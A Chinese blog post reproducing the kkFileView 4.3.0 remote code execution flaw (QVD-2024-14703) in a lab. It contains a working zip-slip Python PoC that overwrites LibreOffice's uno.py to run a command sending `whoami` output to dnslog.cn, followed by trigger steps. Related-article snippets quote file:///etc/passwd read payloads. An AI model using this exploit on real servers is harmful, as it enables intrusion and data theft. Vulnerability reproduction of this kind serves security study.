kkFileView-4.3.0命令执行复现(QVD-2024-14703)

已于 2024-07-19 16:45:49 修改
阅读量212 收藏 1
点赞数 6
文章标签: 网络安全
于 2024-07-19 16:31:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42704754/article/details/140552359
版权

搭建环境

准备好如下材料:

在这里插入图片描述

说明:LibreOffice_7_rpm.tar.gz是LibreOffice_7.5.3.2_Linux_x86-64_rpm.tar.gz重命名得到的。

LibreOffice_7_rpm.tar.gz放到/tmp/下,然后到kkFileView-4.3.0.tar.gz所在目录下执行如下命令:

tar -zxvf kkFileView-4.3.0.tar.gz
cd kkFileView-4.3.0/bin
./startup.sh
systemctl stop firewalld.service
java -jar kkFileView-4.3.0.jar

然后进行访问,http://ip:8012,如下,

在这里插入图片描述
搭建参考:https://blog.csdn.net/m0_71578648/article/details/139120468

漏洞复现

Poc,如下,

# poc.py
import zipfile

if __name__ == "__main__":
    try:
        binary1 = b'test'
        binary2 = b'import os\r\nos.system(\'ping -c 3 `whoami`.6zyvo5.dnslog.cn\')'
        zipFile = zipfile.ZipFile("poc.zip", "a", zipfile.ZIP_DEFLATED)
        info = zipfile.ZipInfo("poc.zip")
        zipFile.writestr("test", binary1)
        zipFile.writestr("../../../../../../../../../../../../../../../../../../../opt/libreoffice7.5/program/uno.py", binary2)
        zipFile.close()
    except IOError as e:
        raise e

需要注意的地方,如下,

../../../../../../../../../../../../../../../../../../../opt/libreoffice7.3/program/uno.py
../../../../../../../../../../../../../../../../../../../opt/libreoffice7.5/program/uno.py

视实际情况进行选择,否则复现失败!
因为我下载的是LibreOffice_7.5.3.2_Linux_x86-64_rpm.tar.gz,所以poc.py中就选了下面那个。
接下来,先生成poc.zip,如下,

python poc.py

将会得到一个poc.zip,再新建一个trigger.odt,内容随意,然后先上传poc.zip并进行预览,之后再上传trigger.odt,并进行预览,漏洞这时就被触发了,如下,
在这里插入图片描述
有个坑点,可能只是我的坑点,漏洞只能复现一次,如果想要再次复现,我就只有恢复快照到kkFileView-4.3.0刚搭建好时的状态。

致志
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kkFileView 任意文件上传致远程代码执行漏洞复现(QVD-2024-14703)
0xSec
04-21 1907
2024年4月,互联网上披露kkFileView远程代码执行漏洞情报,攻击者可利用该漏洞上传恶意文件,获取操作系统权限。该漏洞利用简单,建议受影响的客户尽快修复漏洞。
fileView-4.3.0.zip
08-09
项目特性 # 支持word excel ppt,pdf等办公文档 支持txt,java,php,py,md,js,css等所有纯文本 支持zip,rar,jar,tar,gzip等压缩包 支持jpg,jpeg,png,gif等图片预览(翻转,缩放,镜像) 支持mp3,mp4,flv等多媒体文件预览 使用spring boot开发,预览服务搭建部署非常简便 rest接口提供服务,跨平台特性(java,php,python,go,php,....)都支持,应用接入简单方便 支持普通http/https文件下载url、http/https文件下载流url、ftp下载url等多种预览源 提供zip,tar.gz发行包,提供一键启动脚本和丰富的配置项,方便部署使用 提供Docker镜像发行包,方便在容器环境部署 抽象预览服务接口,方便二次开发,非常方便添加其他类型文件预览支持 最最重要Apache协议开源,代码pull下来想干嘛就干嘛
kkFileView-4.0.0完整包和应用说明
04-21
推荐一个用Spring Boot搭建的文档在线预览解决方案: kkFileView,一款成熟且开源的文件文档在线预览项目解决方案,对标业内付费产品有【永中office】【office365】【idocv】等,免费! 项目特性 支持 office, pdf, cad 等办公文档 支持 txt, xml(渲染), md(渲染), java, php, py, js, css 等所有纯文本 支持 zip, rar, jar, tar, gzip 等压缩包 支持 jpg, jpeg, png, gif, tif, tiff 等图片预览(翻转,缩放,镜像) 使用 spring-boot 开发,预览服务搭建部署非常简便
Centos7.9安装kkfileview4.3.0
m0_71578648的博客
05-22 608
1.下载LibreOffice_7.5.3.2_Linux_x86-64_rpm.tar.gz这个包太慢。目前只有三种方式获取4.3.0。
kkFileview任意文件读取漏洞复现
qq_44484541的博客
11-01 1761
kkFileView为文件文档在线预览解决方案,该项目使用流行的spring boot搭建,易上手和部署,基本支持主流办公文档的在线预览,如doc,docx,xls,xlsx,ppt,pptx,pdf,txt,zip,rar,图片,视频,音频等等。Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。Keking KkFileview是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文件文档在线预览项目。
kkFileview存在任意文件读取漏洞
nnn2188185的博客
04-26 7929
Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。
kkFileView-4.3.0-SNAPSHOT
05-10
总的来说,kkFileView-4.3.0-SNAPSHOT是一款实用的文件预览工具,它致力于提供安全、快速且全面的文件查看体验。无论是在日常办公还是在进行项目开发时,都能成为用户得力的助手。如果你经常需要处理不同类型的文件...
kkFileView-3.5.zip
04-01
kkFileView为文件文档在线预览解决方案,该项目使用流行的spring boot搭建,易上手和部署,基本支持主流办公文档的在线预览,如doc,docx,xls,xlsx,ppt,pptx,pdf,txt,zip,rar,图片,视频,音频等等
kkFileView-2.2.1(Windows版)
03-25
kkFileView-2.2.1:Windows版的文件转换与预览神器》 kkFileView是一款由SpringBoot框架构建的高效、便捷的文件预览工具,特别针对Windows操作系统进行了优化。它利用OpenOffice的强大功能,实现了对多种格式文件...
KKFileView v3.5.1文件预览服务漏洞修复
最新发布
fengshi95的博客
05-23 453
KKFileView演示首页,提供了文件上传的功能,可以上传任意文件。
LibreOffice_5.3.7.2_Linux_x86-64_rpm.tar.gz
07-30
libreOffice5.3 用于 Linux 服务器下word 转换PDF。。。。。。。。。。。。。
LibreOffice_7.2.5_Linux_x86-64_deb.tar.gz
01-17
LibreOffice_7.2.5_Linux_x86-64_deb.tar.gz
kkFileView getCorsFile 任意文件读取漏洞(CVE-2021-43734)
weixin_44304678的博客
11-09 1572
Keking KkFileview是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文件文档在线预览项目。Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件。
kkFileView任意读取漏洞思考
qq_82303224_的博客
04-26 3394
urlPath=file:///etc/passwd //突破限制目录。urlPath=file:///etc/passwd直接可以读文件和。urlPath=file:///etc/passwd 成功读取到内容,urlPath=file:///etc/passwd 提示限制目录预览。.思路7:..|/..|/..|/..|/..|/..|/..|/..|etc/passwd。file:///etc/passwd 也是 500。
kkFileView远程代码执行漏洞分析
qq_18193739的博客
04-23 1845
使用…/…/ 即可导致任意文件内容覆盖转换pdf是启动了LibreOffile执行 C:\Users\26927\Downloads\kkFileView-4.2.1\server\libreoffice\program\uno.py 脚本中内容导致RCE。
KKFileView 4.3 Centos7.9安装部署
心有猛虎细嗅蔷薇
11-07 3668
基于Centos7部署了最新版本的KKfile,归纳总结了全流程,供大家参考,欢迎交流讨论。
kkfileview部署使用
qi95719的博客
06-30 2103
kkfileview下载部署使用尝试
kkFileView文件预览
ZHUSHANGLIN的博客
06-26 516
kkFileView和海康SDK参考项目
kkfileview-4.3.0下载
12-16
kkfileview-4.3.0是一种开源的文件预览工具,可以在网页中直接预览各种类型的文件,如文档、图片、音频、视频等。这个版本的kkfileview有很多改进和新增功能。可以通过在网上搜索kkfileview-4.3.0进行下载。 首先,访问kkfileview官方网站或在开源社区中搜索kkfileview-4.3.0版本的下载链接。找到可信赖的下载源后,点击下载按钮或提供的链接开始下载。下载的文件通常是一个压缩包,包含有kkfileview-4.3.0的安装文件和相关文档。 下载完成后,解压缩文件,可以看到安装文件和一些文档说明。根据操作系统的不同,选择对应的安装文件进行安装。双击运行安装文件,按照提示进行安装。在安装过程中,可以选择安装路径和相关设置。 安装完成后,可以根据软件的指南和文档进行进一步的配置和使用。kkfileview-4.3.0提供了友好的用户界面和简单的操作方式,可以根据需要自定义预览文件的样式和功能。通过设置文件的路径或链接,可以将文件嵌入到网页中,实现在线预览的功能。 总之,kkfileview-4.3.0是一款强大的文件预览工具,可以方便地在网页中预览各种类型的文件。下载并安装该版本后,可以按照需要进行配置和使用。希望以上回答对您有帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值